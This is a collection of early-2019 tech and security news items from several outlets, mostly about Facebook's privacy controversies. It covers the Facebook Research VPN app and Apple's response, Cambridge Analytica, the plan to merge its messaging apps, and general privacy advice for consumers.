Facebook is at the center of another privacy scandal -- and this time it hasn't just angered users. It has also angered Apple. From a report: The short version: Apple says Facebook broke an agreement it made with Apple by publishing a "research" app for iPhone users that allowed the social giant to collect all kinds of personal data about those users, TechCrunch reported Tuesday. The app allowed Facebook to track users' app history, their private messages and their location data. Facebook's research effort reportedly targeted users as young as 13 years old. As of last summer, apps that collect that kind of data are against Apple's privacy guidelines. That means Facebook couldn't make this research app available through the App Store, which would have required Apple approval. Instead, Facebook apparently took advantage of Apple's "Developer Enterprise Program," which lets approved Apple partners, like Facebook, test and distribute apps specifically for their own employees. In those cases, the employees can use third-party services to download beta versions of apps that aren't available to the general public. Update: The Verge reports: Apple has shut down Facebook's ability to distribute internal iOS apps, from early releases of the Facebook app to basic tools like a lunch menu. A person familiar with the situation tells The Verge that early versions of Facebook, Instagram, Messenger, and other pre-release "dogfood" (beta) apps have stopped working, as have other employee apps, like one for transportation. Facebook is treating this as a critical problem internally, we're told, as the affected apps simply don't launch on employees' phones anymore. Update 2: Apple says it shut down Facebook's app before the social company could voluntarily shut it down -- contrary to an earlier statement by Facebook, in which it said it was shutting down the app.

Read more of this story at Slashdot.

Facebook to shut down iOS app that allowed for near total data access

When Apple banned its Onavo VPN app from its App Store last summer, Facebook repackaged the app, named it “Facebook Research” and offered it for download through three app beta testing services, TechCrunch has discovered. About the Facebook Research app Facebook used the Onavo app to collect the aforementioned data of both Android and iOS users and, based on the information gleaned from it, made decisions to acquire competing apps and add popular features … More

The post Facebook to shut down iOS app that allowed for near total data access appeared first on Help Net Security.

Facebook Pays Teens to Download a VPN App That Spies on Them

In an attempt to gather data on its competitors, Facebook has been secretly paying people to install a VPN to

Facebook Pays Teens to Download a VPN App That Spies on Them on Latest Hacking News.

Facebook Pays Teens To Install VPN That Spies On Them

A new report from TechCrunch details how "desperate" Facebook is for data on its competitors. The social media company "has been secretly paying people to install a 'Facebook Research' VPN that lets the company suck in all of a user's phone and web activity," a TechCrunch investigation confirms. "Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity." From the report: Since 2016, Facebook has been paying users ages 13 to 35 up to $20 per month plus referral fees to sell their privacy by installing the iOS or Android "Facebook Research" app. Facebook even asked users to screenshot their Amazon order history page. The program is administered through beta testing services Applause, BetaBound and uTest to cloak Facebook's involvement, and is referred to in some documentation as "Project Atlas" a fitting name for Facebook's effort to map new trends and rivals around the globe. We asked Guardian Mobile Firewall's security expert Will Strafach to dig into the Facebook Research app, and he told us that "If Facebook makes full use of the level of access they are given by asking users to install the Certificate, they will have the ability to continuously collect the following types of data: private messages in social media apps, chats from in instant messaging apps -- including photos/videos sent to others, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps you may have installed." It's unclear exactly what data Facebook is concerned with, but it gets nearly limitless access to a user's device once they install the app.

Read more of this story at Slashdot.

IT Security Expert Blog: 43% of Cybercrimes Target Small Businesses – Are You Next?

Cybercrimes cost UK small companies an average of £894 in the year ending February 2018. Small businesses are an easy target for cybercrooks, so it is little surprise that around 43% of cybercrime is committed against small businesses. According to research conducted by EveryCloud, there is much more at stake than a £900 annual loss, with six out of ten small businesses closing within six months of a data breach.

Damage to a small company’s reputation can be difficult to repair and recover from following a data breach. Since the GDPR data privacy law came into force in May 2018, companies face significant financial sanctions from regulators if found negligent in safeguarding personal information. Add in the potential for civil suits and the costs start mounting up fast, which could even turn into a business killer. A case in point is political consulting and data mining firm Cambridge Analytica, which went under in May 2018 after being implicated in data privacy issues related to its use of personal data held on Facebook. However, most small businesses taken out by cyber attacks don't have the public profile to make the deadly headlines.

Most big companies have contingency plans and resources to take the hit from a major cyber attack; although major cyber attacks prove highly costly to big business, the vast majority are able to recover and continue trading. Working on a tight budget, small businesses just don't have the deep pockets of big business. Cyber resilience is not a high priority within most small businesses' strategies; as you might imagine, business plans are typically very focused on business growth.

Cyber resilience within a small business need not be difficult, but it does involve going beyond installing antivirus. A great starting point is the UK National Cyber Security Centre's Cyber Essentials Scheme, a simple but effective approach to help businesses protect themselves from the most common cyber attacks. You’ll also need to pay attention to staff security awareness training in the workplace.

Every employee must ensure that the company is protected from attacks as much as possible. It’s your responsibility to make sure that everyone understands this and knows what preventative measures to put in place.

It may cost a few bob, but getting an expert in to check for holes in your cybersecurity is a good place to start. They can check for potential risk areas and also educate you and your staff about security awareness.

We all know the basics, but how many times do we let convenience trump good common sense? For example, how many times have you used the same password when registering for different sites?

How strong is the password that you chose? If it’s easy for you to remember, then there’s a good chance that it’s not as secure as you’d like. If you’d like more tips on keeping your information secure, then check out the infographic below.



What does ‘consent to tracking’ really mean?

Thanks to Jerome Boursier for contributions.

Post GDPR, many social media platforms will ask end users to consent to some form of tracking as a condition of using the service. It’s easy to make assumptions as to what that means, especially when the actual terms of service or data policy for the service in question is tough to find, full of legal jargon, or just long and boring. Part of the shock of Facebook stories was in discovering just how expansive their consent to tracking really was. Let’s take a look at what can happen after you hit OK on a new site’s Terms of Service.

What we think they’re doing

Most commonly, users think that social media sites limit their tracking to actual interactions with the site while logged in. This includes likes, follows, favorites, and general use of the site as intended. Those interactions are then analyzed to determine a user’s rough interests, and serve them corresponding ads.

We asked some non-technical Malwarebytes staffers what they thought popular companies collected on them and got the following responses:

“Hmm I would assume just my name, birthday, trends in the hashtags I use, and locations I’m at. Nothing else.”

“As far as IG goes, I’m guessing they collect data on the hashtags I follow and what I look at because all the ads are home improvement ads.”

While these are common use cases for tracking, innovations in user surveillance have allowed companies to take much more invasive actions.

What they’re actually doing

The Cambridge Analytica reports were quite shocking, but in theory their data practices were actually a violation of the agreement they had with Facebook. Somewhat more concerning are actions that Facebook and other social media companies take overtly with third parties, or as part of their explicit terms of service.

In June 2018, a New York Times report revealed partnerships between Facebook and mobile device manufacturers allowed data collection on your Facebook friends, irrespective of whether those friends had allowed data sharing with third parties. This data collection varied by device manufacturer, and most were relatively benign. Blackberry, however, seemed to go beyond what most of us expect to be collected when we log in:

Facebook has been known for years to have somewhat creepy partnerships like this. But what about other platforms? Instagram has an interesting paragraph in its terms and conditions:

Does “communications” include direct messages? How long is this information stored, where, and under what conditions? It could be perfectly secure and anonymized, but it’s difficult to tell because Instagram is a little vague on these points. Companies consistently tell us what they collect, but they don’t always tell us why or disclose retention conditions, which makes it difficult for a user to make a proper risk assessment before allowing tracking.

Outside of the Facebook family of products, Pinterest does some data sharing that you might not expect:

Kudos to Pinterest for providing clear opt-out instructions.

A reasonable user might not expect that, when consenting to tracking connected with a Pinterest account, they would also be agreeing to offsite tracking. Pinterest does stand out, however, by presenting well organized and clear information followed by simple opt-out instructions after each section.

What they might be doing

Most platforms that engage in user tracking do so in ways that raise concern, but are not overtly alarming. Abuses we’ve heard about tend to center on the tracking company sharing information with third parties. So what might happen if the wrong third party gains access to this data?

In 2016, a ProPublica investigation was able to use Facebook ad targeting to create a housing ad that excluded minorities from seeing it. (This probably violates the US Fair Housing Act.) Using user data to discriminate in plausibly deniable ways predates the Internet, but the unprecedented volume of data collected makes schemes by bad actors much more efficient and easy to launch.

A more speculative harm is the use of tracking tags on sensitive websites. In France, a government website providing accurate information on reproductive health services was using a Facebook tracker. A “trusted partner” receiving user metadata, as well as which sections of the site that user clicks on, has the potential to be profoundly invasive. From a risk mitigation perspective, a user with a Facebook account might not have anticipated this sort of tracking when they initially consented to Facebook’s terms of service.

A common counter to complaints regarding user tracking is, “Well, you agreed to their terms, so you should have expected this.” This is arguably applicable to basic metadata collection and targeted ads, but is it reasonable to expect a Facebook user to understand that their off-platform browsing is subject to surveillance as well? User tracking has progressed so far in sophistication that an average user most likely does not have the background necessary to imagine every possible use case for data collection prior to accepting a user agreement.

What you can do about it

If any of the above examples make you uncomfortable, check out how to secure some common social media platforms using internal settings. If you want to implement additional technical solutions, browser extensions like Ghostery and the EFF’s Privacy Badger can prevent trackers from sucking up data you would prefer not to hand over.

Messenger services are a bit harder to transition away from, but not impossible. Signal is a well-regarded messenger app with end-to-end encryption, and a history of respecting user privacy. Alternatively, Wire can provide a more business-oriented alternative, with screen sharing, file sharing, and access role management.

Most important is to stay suspicious when accessing a new platform. No one can mishandle data that you never agree to hand over to begin with. Stay vigilant, stay safe, and enjoy your social media platforms knowing exactly how your data is being used.

The post What does ‘consent to tracking’ really mean? appeared first on Malwarebytes Labs.

HOTforSecurity: Facebook to Merge WhatsApp, Instagram, Facebook Messenger by 2020

Looking to gain more control over the company’s communication platforms and prevent users from switching to competitors, Facebook CEO Mark Zuckerberg will merge WhatsApp, Instagram and Facebook Messenger, writes The New York Times. The integration is expected to be complete by 2020 and will serve over 2.6 billion users.

“The services will continue to operate as stand-alone apps, but their underlying technical infrastructure will be unified,” the newspaper reported, citing four people involved in the effort, whom it didn’t name.

The merger, part of the tech company’s larger plan to increase revenue and advertising opportunities, raises security and privacy concerns regarding user data and how the cross-platform communication will further handle data sharing.

“This is why there should have been far more scrutiny during Facebook’s acquisitions of Instagram and WhatsApp, which now clearly seem like horizontal mergers that should have triggered antitrust scrutiny,” Representative Ro Khanna, Democrat of California, said on Twitter. “Imagine how different the world would be if Facebook had to compete with Instagram and WhatsApp.”

According to Facebook, the apps will benefit from end-to-end encryption because they want to “build the best messaging experiences we can; and people want messaging to be fast, simple, reliable and private. We’re working on making more of our messaging products end-to-end encrypted and considering ways to make it easier to reach friends and family across networks.”

However, the merger and possible lack of autonomy raise trust issues and internal conflicts, following the departure of WhatsApp and Instagram founders. Inside sources who spoke with The New York Times say the reconfiguration of all three services will be the work of thousands but the company is still figuring out all the details.  



Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea

This one may not be good news for many. Zuckerberg has finally disclosed his idea of merging the three key

Merging WhatsApp, Instagram, And Facebook Messenger – Zuckerberg’s Uncanny Idea on Latest Hacking News.

Facebook: A timeline of security failings

Facebook is the world’s most popular social network, boasting 2.27 billion active users every month. That’s 2.27 billion people who trust all kinds of personal information to Facebook for safe-keeping.

Unfortunately, Facebook doesn’t have a great track record of protecting its users. This timeline shows some of the biggest privacy breaches since 2005.

December 2005

To help demonstrate threats to privacy caused by “over sharing” on social networks, a team of researchers publish a script that allows them to download user data from Facebook. The team manage to acquire personal data from 70,000 profiles, arguing that businesses are carrying out similar activities, stealing data without the permission of the affected users.

December 2007

Facebook releases a new product called “Beacon”, designed to help advertisers better understand their audience by tracking their movements on other websites. Beacon extends the user’s Facebook profile based on this behaviour, recording videos hired from Blockbuster Video for instance. This feature breaks the American Video Privacy Protection Act, and Facebook is forced to settle a $9.5 million class action lawsuit brought by affected users.

December 2009

Facebook publicly publish information marked private on users’ pages. A Federal Trade Commission investigation forces Facebook to apologise, and to promise improved management and protection of personal data.

June 2013

Facebook announces discovery of a bug that allows users to download contact information belonging to friends of friends – without asking permission. Official estimates suggest that as many as 6 million people have their personal information taken in this way.

February 2014

A new data-driven start-up called Cambridge Analytica asks volunteers to install a new Facebook app called thisisyourdigitallife. The app then downloads information from the user’s profile, including lists of friends, likes and some private messages. The app breaks Facebook’s terms of service, but remains in place until December 2015. By then 87 million profiles have been harvested by Cambridge Analytica, ready for use in targeting fake news stories and other marketing-related activities.

Facebook has already been fined £500,000 by the UK’s Information Commissioner for its part in the Cambridge Analytica scandal. The issue remains under investigation in the US and elsewhere.

April 2018

Facebook is forced to announce that ‘malicious actors’ have used the built-in search function to harvest the public profile data of almost their entire user base. Almost all 2 billion users have had their data collected by third parties without their permission.

June 2018

Journalists uncover “secret” agreements between Facebook and several smartphone manufacturers. In return for improving the Facebook experience on their devices, Samsung, Microsoft, Apple, Huawei, Lenovo and others have been given access to personal data belonging to the phone’s owner and their friends, even if those friends have chosen not to share their data with third parties.

July 2018

A new bug overrides users’ block lists. For 8 days, blocked users are able to see personal information against the wishes of account holders.

August 2018

The popular data-saving app Onavo is removed from the App Store after complaints that web activity is being collected by Facebook (Onavo’s owner), violating Apple’s privacy rules.

September 2018

A new bug in the “view as” feature allows hackers to forge authentication tokens and take control of up to 50 million user accounts.

Be careful who you trust with your data

Over the past 13 years Facebook has become a victim of its own success. With access to the personal data belonging to more than 2 billion people, the social network is a natural target for hackers and cyber criminals – but a relaxed attitude to security and privacy has only made it easier for malicious activity to thrive.

All Facebook users should regularly check their privacy and security settings to ensure they are using the tools provided to protect themselves. In the long term, however, questions need to be asked about whether the benefits of Facebook outweigh the obvious risks to users’ online safety.

The post Facebook: A timeline of security failings appeared first on Panda Security Mediacenter.

Facebook Is Shutting Down Moments

Facebook Moments, the standalone mobile app designed to let users privately share photos and videos, is shutting down next month. "Facebook confirmed the app's services will end February 25," reports TechCrunch. "Facebook decided to end support for the app, which hasn't been updated in some time, because people weren't using it." From the report: Moments, which first launched in 2015, has seen some competition from other Facebook products recently, which might have led to its demise. For instance, Facebook built out its Stories feature, which includes a direct sharing option. That option, while designed for one-offs and not whole albums, did allow users to bypass the Moments app entirely in order to privately send photos with a select friend or friends. Users also have the option to share any of their photos from the app as Albums on Facebook. If someone downloads the app to an Album, the privacy setting will default to "Only Me" but a user always has the option to share it with friends. Facebook says it will continue to incorporate options for saving memories within the Facebook app, as well. "We're ending support for the Moments app, which we originally launched as a place for people to save their photos. We know the photos people share are important to them so we will continue offering ways to save memories within the Facebook app," Rushabh Doshi, director of product management said in a statement. If you're a Moments user, you should see a message warning you about the app's demise. You can either export your photos from any device, or create a private album on your Facebook account to retrieve your photos.

Read more of this story at Slashdot.

Facebook’s Plan To Merge WhatsApp, Instagram, and Messenger Sounds a Privacy Alarm

Facebook's new plan to integrate WhatsApp, Instagram and Facebook Messenger will lead to more data about users being shared between them, a new report warns. The effort to make it easier for people to participate in conversations across its various messaging platforms sounds harmless, but it raises issues about how data will be shared across the platforms, and with third parties. The good news is that the apps will all be required to use end-to-end encryption. MIT Technology Review reports: Facebook says it wants to make it easier for people to communicate across its "ecosystem" of apps. But the real driver here is a commercial one. By making it easier to swap messages, Facebook can mine even more data to target ads with, and come up with more money-spinning services. There's another potential benefit: by integrating its messaging apps more tightly, Facebook can argue it would be harder to spin one or more of them off, as some antitrust campaigners think it should be forced to do.

Read more of this story at Slashdot.

Facebook to integrate Whatsapp, Messenger and Instagram

Don’t own any Facebook or WhatsApp account? No worries!


Mark Zuckerberg, the chief executive of Facebook, plans to integrate the messaging services of the company’s social networking platforms WhatsApp, Facebook Messenger, and Instagram.

The move is planned to establish his control over the company’s sprawling divisions.

It was seen as necessary because, in the past, the company’s business has clearly been battered by scandals.

The move, as described by four people involved in the effort, requires thousands of Facebook employees to reconfigure how WhatsApp, Instagram and Facebook Messenger function at their most basic levels.

All three services will, however, continue operating as stand-alone apps.

Zuckerberg has also assured that all of the apps will incorporate end-to-end encryption. This will protect messages from being viewed by anyone except the participants in the conversation.

After the changes take place, a Facebook user will be able to send an encrypted message to someone who has only a WhatsApp account.

Currently, this isn’t possible because the apps are separate.

By stitching the apps’ infrastructure together, Zuckerberg wants to increase the utility of the social network, keeping its billions of users highly engaged inside its ecosystem.

You could say this move copies another big tech company, Apple Inc., which has pursued the same strategy in order to eliminate its competitors.

If users interact more frequently with Facebook’s apps, the company may also be able to build up its advertising business (which is the main source of their income) or add new services to make money, they said.

In a statement, Facebook said it wanted to “build the best messaging experiences we can; and people want messaging to be fast, simple, reliable and private.” It added: “We’re working on making more of our messaging products end-to-end encrypted and considering ways to make it easier to reach friends and family across networks.”

That sums up the considerable effort Facebook will be undertaking in the near future.

Stay tuned for more such stories.

The post Facebook to integrate Whatsapp, Messenger and Instagram appeared first on TechWorm.

Meet the Bots That Review and Write Snippets of Facebook’s Code

Wave723 writes: To make its developers' jobs more rewarding, Facebook is now using two automated tools called Sapienz and SapFix to find and repair low-level bugs in its mobile apps. Sapienz runs the apps through many tests to figure out which actions will cause it to crash. Then, SapFix recommends a fix to developers, who review it and decide whether to accept the fix, come up with their own, or ignore the problem.

Read more of this story at Slashdot.

Advocacy Groups Are Pushing The FTC To Break Up Facebook

An anonymous reader quotes the Verge: Advocacy groups are calling for Facebook to be broken up as a result of its Cambridge Analytica scandal, subsequent privacy violations, and repeated consumer data breaches. Groups like Open Market Institute, Color of Change, and the Electronic Privacy Information Center wrote to the Federal Trade Commission Thursday requesting a major government intervention into how Facebook operates. The letter outlined several moves the FTC could take, including a multibillion-dollar fine, reforming the company's hiring practices, and most importantly, breaking up one of the most powerful social media companies for abusing its market position... According to organizations like Open Market Institute and Color of Change, Facebook should be required to give up $2 billion and divest ownership of Instagram and WhatsApp for failing to protect user data on those platforms as well. "Given that Facebook's violations are so numerous in scale, severe in nature, impactful for such a large portion of the American public and central to the company's business model, and given the company's massive size and influence over American consumers," the letter reads, "penalties and remedies that go far beyond the Commission's recent actions are called for."

Read more of this story at Slashdot.

Facebook opens up on System that ‘protects Billions’

Facebook used a blog post on Friday to describe, in detail, the systems that it uses to secure its vast social network, including custom designed tools and so-called "red team" hacks.

The post Facebook opens up on System that ‘protects Billions’ appeared first on The Security Ledger.

Facebook Deliberately Allowed ‘Friendly Fraud’ To Avoid Harming Revenue

An anonymous reader quotes a report from Gizmodo: Newly unsealed court documents show that Facebook was aware that underage children routinely used their parents' payment information to spend large sums of money on in-game purchases, and the company chose not to fix the problem. For years, it allowed for what it called "friendly fraud" because it feared implementing protections would harm revenue, according to the documents. In 2016, Facebook settled a class-action lawsuit brought by parents of children who were tricked into unwittingly making purchases with real money while playing free video games hosted on the social media platform. Despite its recognition of the problem, internal discussions show that Facebook decided it would be best to fight refund requests and allow the problem to persist. Documents related to the case were placed under seal because Facebook successfully argued that releasing them to the public could harm its business. Reveal, a publication run by the Center for Investigative Reporting, argued that these documents were in the public interest; last week, a judge granted Reveal's request to release the documents. On Thursday night, 135 pages from the court proceedings were unsealed, though Facebook was allowed to maintain some redactions.

Read more of this story at Slashdot.

Smashing Security #112: Payroll scams, gold coin heists, web giants spanked

Business email compromise evolves to target your company’s payroll, how the world’s largest gold coin was stolen from a Berlin museum, and are internet giants feeling the heat yet over data security?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by people hacker Jenny Radcliffe.

Facebook and Airbus working on solar-powered drones connectivity project

Facebook and Airbus plan to test solar-powered drones to connect remote areas to the internet

The social media giant Facebook and aircraft manufacturer Airbus have collaborated on a new drone connectivity project in Australia to beam internet access to remote areas, reports Germany’s Netzpolitik.

For those unaware, Facebook had halted its own solar-powered internet drone project, Aquila last June after years of development. Back then, the company had said that it would no longer build the drones. However, it added that it was still committed to the original goal of bringing more people online and for that it would instead depend on other companies to build aircraft.

Documents obtained by Netzpolitik under the Australian Freedom of Information Act show that both companies plan to test the solar-powered drones in Australian territory. It is learnt that Airbus met with the Australian Civil Aviation Safety Authority (CASA) at least 18 times between March and September last year to obtain approval for the tests. The company was finally given a drone operator certificate on September 19, 2018.

The documents suggest that flights with these drones were planned for November and December 2018, with the tests scheduled to take place at Wyndham airfield in Western Australia. Further, the payload for the drone was to be provided by Facebook. However, it is unclear whether any flights have taken place yet. According to the minutes, delays in previous tests had prevented them from going ahead.

The trials reportedly involved the use of Airbus’ Zephyr drone, a model that is designed for “defense, humanitarian and environmental missions.” The Zephyr drone was developed by Airbus with the aim of providing internet to the Earth’s surface from about 30 kilometers up, in the stratosphere.

“We continue to work with partners on High Altitude Platform System (HAPS) connectivity. We don’t have further details to share at this time,” a Facebook spokesperson told NetzPolitik.

Both Facebook and Airbus have declined to provide any further details. However, it is clear that Facebook through its projects is aiming to increase internet access worldwide, particularly in developing regions such as Asia, Africa, and Latin America, and also in remote areas. It is also trying to make internet service available at much more affordable prices by using software and existing infrastructure.

The post Facebook and Airbus working on solar-powered drones connectivity project appeared first on TechWorm.

Facebook’s Plans For Space Lasers Revealed

Two new observatories are being built on Mount Wilson in California -- home to the 100-inch Hooker telescope, one of the largest aperture telescopes in the world, and CHARA array, the world's largest optical interferometer. As IEEE Spectrum reports, "they could house Facebook's first laser communications systems designed to connect to satellites in orbit." From the report: Construction permits issued by the County of Los Angeles show that a small company called PointView Tech is building two detached observatories on the mountain peak. PointView is the company that IEEE Spectrum revealed last year to be a previously unknown subsidiary of Facebook working on an experimental satellite called Athena. In April, PointView sought permission from the U.S. Federal Communications Commission to test whether E-band radio signals could "be used for the provision of fixed and mobile broadband access in unserved and underserved areas." That application was still pending at the FCC before the current U.S. federal government shutdown took effect, but it and other public documents and presentations now strongly suggest that PointView is planning to utilize laser technology, possibly both in Athena and future spacecraft. [...] Planning documents show that construction work on PointView's Mount Wilson observatories began in July and passed inspection in the middle of December. If the observatories are part of a laser satellite installation, they might use an optical ground station conceptually similar to [German company Mynaric]. This transmits its own laser beam up into the atmosphere for a drone -- or potentially a satellite -- to lock on to. Facebook and the Mount Wilson Institute didn't comment, but the report does go on to cite scientific papers authored by Facebook researchers suggesting that the company is committing resources to orbital lasers. 
"In a series of papers published in 2017 and 2018, engineers Raichelle Aniceto and Slaven Moro subjected multiple components, including an optical modem, to radiation similar to that experienced on orbit," reports IEEE Spectrum.

Read more of this story at Slashdot.

Russia Tries To Force Facebook, Twitter To Relocate Servers To Russia

An anonymous reader quotes a report from Ars Technica: The Russian government agency responsible for censorship on the Internet has accused Facebook and Twitter of failing to comply with a law requiring all servers that store personal data to be located in Russia. Roskomnadzor, the Russian censorship agency, "said the social-media networks hadn't submitted any formal and specific plans or submitted an acceptable explanation of when they would meet the country's requirements that all servers used to store Russians' personal data be located in Russia," The Wall Street Journal reported today. Roskomnadzor said it sent letters to Facebook and Twitter on December 17, giving them 30 days to provide "a legally valid response." With the 30 days having passed, the agency said that "Today, Roskomnadzor begins administrative proceedings against both companies." The law went into effect in September 2015, but Russia has had trouble enforcing it. "At the moment, the only tools Russia has to enforce its data rules are fines that typically only come to a few thousand dollars or blocking the offending online services, which is an option fraught with technical difficulties," a Reuters article said today. According to The Journal, "Facebook and Twitter could be fined for not providing information to the watchdog."

Read more of this story at Slashdot.

Facebook to finally answer for Cambridge Analytica scandal; record fine expected

After scandalizing the world with the Cambridge Analytica affair, Facebook is finally coming under legal fire for letting the political consultancy access personal information on 87 million users without their knowledge.

The U.S. Federal Trade Commission (FTC) seeks to slap the social network with a record fine, likely much larger than the current record — a $22.5 million fine the FTC imposed on Google in 2012 for privacy-related violations, reports the New Hampshire Union Leader.

The investigation into the scandal is not finished, but staff have been briefed on the probe and plan to issue a formal recommendation for a fine. The commissioners will then vote on it to set the final penalty.

Facebook itself has been in talks with the FTC regarding its imminent punishment, suggesting that it has been cooperative in the process.

“The key question for the FTC is if Facebook’s business practices — and the protections and privacy controls it afforded consumers — violated requirements spelled out in a consent decree brokered by the agency the last time the tech giant deceived consumers about its practices. Only through such a finding could the FTC levy a fine,” the report notes.

Cambridge Analytica, as readers will remember, had ties to Donald Trump’s U.S. presidential campaign and is believed to have helped him beat his opponent Hillary Clinton by using harvested Facebook data to better target voters with political messages.

Since the scandal, Facebook has stumbled a few more times, and will likely incur several more penalties under different laws.

New research by Accenture indicates that cybercrime will cost businesses around 5 trillion dollars over the next five years.

Facebook Launches a Petition Feature

Tomorrow Facebook will encounter a slew of fresh complexities with the launch of Community Actions, its News Feed petition feature. From a report: Community Actions could unite neighbors to request change from their local and national elected officials and government agencies. But it could also provide vocal interest groups a bully pulpit from which to pressure politicians and bureaucrats with their fringe agendas. Community Actions embodies the central challenge facing Facebook. Every tool it designs for positive expression and connectivity can be subverted for polarization and misinformation. Facebook's membership has swelled into such a ripe target for exploitation that it draws out the worst of humanity. You can imagine misuses like "Crack down on [minority group]" that are offensive or even dangerous but some see as legitimate. The question is whether Facebook puts in the forethought and aftercare to safeguard its new tools with proper policy and moderation. Otherwise each new feature is another liability. Community Actions start to roll out to the US tomorrow after several weeks of testing in a couple of markets. Users can add a title, description, and image to their Community Action, and tag relevant government agencies and officials who'll be notified. The goal is to make the Community Action go viral and get people to hit the "Support" button. Community Actions have their own discussion feed where people can leave comments, create fundraisers, and organize Facebook Events or Call Your Rep campaigns. Facebook displays the numbers of supporters behind a Community Action, but you'll only be able to see the names of those you're friends with or that are Pages or public figures.

Read more of this story at Slashdot.

Facebook is secretly working on a new meme hub app ‘LOL’ for teens

Facebook secretly testing a meme hub app called ‘LOL’ to win teens over

Facebook is trying every possible means to woo back its lost audience of teenage smartphone users from other social platforms such as Snapchat, Instagram, YouTube, and TikTok.

After working on a dating app, the social media giant is now developing another app, dubbed ‘LOL’. This new platform is designed as a “special feed of funny videos and GIF-like clips” using content “pulled from News Feed posts by top meme Pages on Facebook,” according to a new report from TechCrunch.

“We are running a small scale test and the concept is in the early stages right now,” a Facebook spokesperson confirmed to TechCrunch.

The content will be divided into categories like “For You”, “Animals”, “Fails” and “Pranks”. Further, users will be able to choose from three reactions: “Funny,” “Alright,” or “Not Funny” that would appear under each meme.

Currently, around 100 high school students in the U.S. with their parents’ consent are testing the LOL app, and are apparently giving their feedback to Facebook engineers.

“‘LOL’ is currently in private beta with around 100 high school students who signed non-disclosure agreements with parental consent to do focus groups and one-on-one testing with Facebook staff,” said the report.

Those testing the private beta say that LOL is slightly “cringey” and that it feels like Facebook is trying unsuccessfully to stay young.

According to TechCrunch, LOL is presently being tested as a replacement for Facebook Watch. It is currently unclear if “LOL” will become a standalone app or be available in the main Facebook app.

This is not the first time that Facebook has tried to lure a younger audience with its apps. In 2014, Facebook launched a Snapchat clone app, ‘Slingshot’, which has since been abandoned. In late 2018, the company introduced ‘Lasso’, a stand-alone music app to rival the popular short-video social network TikTok, which is apparently still running.

The post Facebook is secretly working on a new meme hub app ‘LOL’ for teens appeared first on TechWorm.

Mark Zuckerberg’s Mentor ‘Shocked and Disappointed’ — But He Has a Plan

Early Facebook investor Roger McNamee published a scathing 3,000-word article adapted from his new book Zucked: Waking Up to the Facebook Catastrophe. Here's just one example of what's left him "shocked and disappointed": Facebook (along with Google and Twitter) has undercut the free press from two directions: it has eroded the economics of journalism and then overwhelmed it with disinformation. On Facebook, information and disinformation look the same; the only difference is that disinformation generates more revenue, so it gets better treatment.... At Facebook's scale -- or Google's -- there is no way to avoid influencing the lives of users and the future of nations. Recent history suggests that the threat to democracy is real. The efforts to date by Facebook, Google and Twitter to protect future elections may be sincere, but there is no reason to think they will do anything more than start a game of whack-a-mole with those who choose to interfere. Only fundamental changes to business models can reduce the risk to democracy. Google and Facebook "are artificially profitable because they do not pay for the damage they cause," McNamee argues, adding that some medical researchers "have raised alarms noting that we have allowed unsupervised psychological experiments on millions of people." But what's unique is he's offering specific suggestions to fix it. "I want to set limits on the markets in which monopoly-class players like Facebook, Google and Amazon can operate. The economy would benefit from breaking them up. A first step would be to prevent acquisitions, as well as cross subsidies and data sharing among products within each platform." "Another important regulatory opportunity is data portability, such that users can move everything of value from one platform to another. This would help enable startups to overcome an otherwise insurmountable barrier to adoption." 
"Given that social media is practically a public utility, I think it is worth considering more aggressive strategies, including government subsidies." "There need to be versions of Facebook News Feed and all search results that are free of manipulation." "I would like to address privacy with a new model of authentication for website access that permits websites to gather only the minimum amount of data required for each transaction.... it would store private data on the device, not in the cloud. Apple has embraced this model, offering its customers valuable privacy and security advantages over Android." "No one should be able to use a user's data in any way without explicit, prior consent. Third-party audits of algorithms, comparable to what exists now for financial statements, would create the transparency necessary to limit undesirable consequences." "There should be limits on what kind of data can be collected, such that users can limit data collection or choose privacy. This needs to be done immediately, before new products like Alexa and Google Home reach mass adoption."

Read more of this story at Slashdot.

Twitter bug exposed private tweets of Android users to public for years

By Carolina

A security bug in Twitter exposed private tweets of users to the public. The flaw only affected Android users of the Twitter app while iPhone users were not affected. According to Twitter, private tweets of users from November 3, 2014, to January 14, 2019, were exposed. Although the company did not say how many people were affected […]

This is a post from HackRead.com Read the original post: Twitter bug exposed private tweets of Android users to public for years

Lawsuit Reveals How Facebook Profited Off Confused Children: Report

Documents outlining how Facebook profited off children are expected to be made public soon, according to Reveal News of the Center for Investigative Reporting (CIR), which requested the documents. From a report: In a report about the trove of previously-sealed documents, Reveal News explains that Facebook has previously faced lawsuits for failing to refund charges made by children playing games on Facebook. According to Reveal, the children did not know that their parents' credit card was stored on the platform when they clicked "buy," and in some cases, hundreds or even thousands of dollars were spent. In one case, the plaintiff, who is a child, spent several hundred dollars in just a few weeks. According to the report, more documents show "widespread confusion by children and their parents, who didn't understand Facebook continued to charge them as they played games."

Read more of this story at Slashdot.

Facebook open sources Spectrum for efficient uploading of images

Facebook launches open-sourced Spectrum for better mobile image production

Facebook has officially released an open source tool to the developer community to make the process of uploading images more efficient.

Dubbed “Spectrum”, this tool is a cross-platform image transcoding library that can easily be integrated into an Android or iOS project to efficiently perform common image operations. It aims to improve the reliability and quality of image uploads while reducing image upload time and mobile data consumption.

“As modern smartphones capture high-resolution images, the large file size makes uploads unreliable on some mobile networks. Sending it at full resolution is often wasteful, as the content delivery network (CDN) will resize the image for the recipient anyway,” said Facebook mobile software engineer Daniel Hugenroth.

“Resizing the image on the sender’s device reduces the bandwidth required to send the image. As a result, the entire pipeline has minimal payload overhead, improving the end-to-end experience. The remaining challenge is how to maintain image quality while benefiting from the smaller file.”

Spectrum uses a “declarative” API that allows developers to focus on the desired output properties instead of the individual steps. It prefers a lossless operation for cropping and rotating JPEG images, while in resizing it “optimizes the interplay between decoder sampling and pixel-perfect resizing.” It also uses C/C++ code for higher performance with Java and Objective-C wrapper APIs to make development easier.

Spectrum integrates with native image compression libraries, including MozJPEG, which allow control of encoding parameters beyond the general-purpose platform APIs. It allows developers to use computationally intensive encoding, which requires more processing time but significantly reduces the file size. Additionally, it enables control over more advanced parameters such as chroma subsampling to improve the quality of images with sharp edges and illustrations.

“The consistent API makes these features accessible to developers who are not image experts,” Hugenroth added.

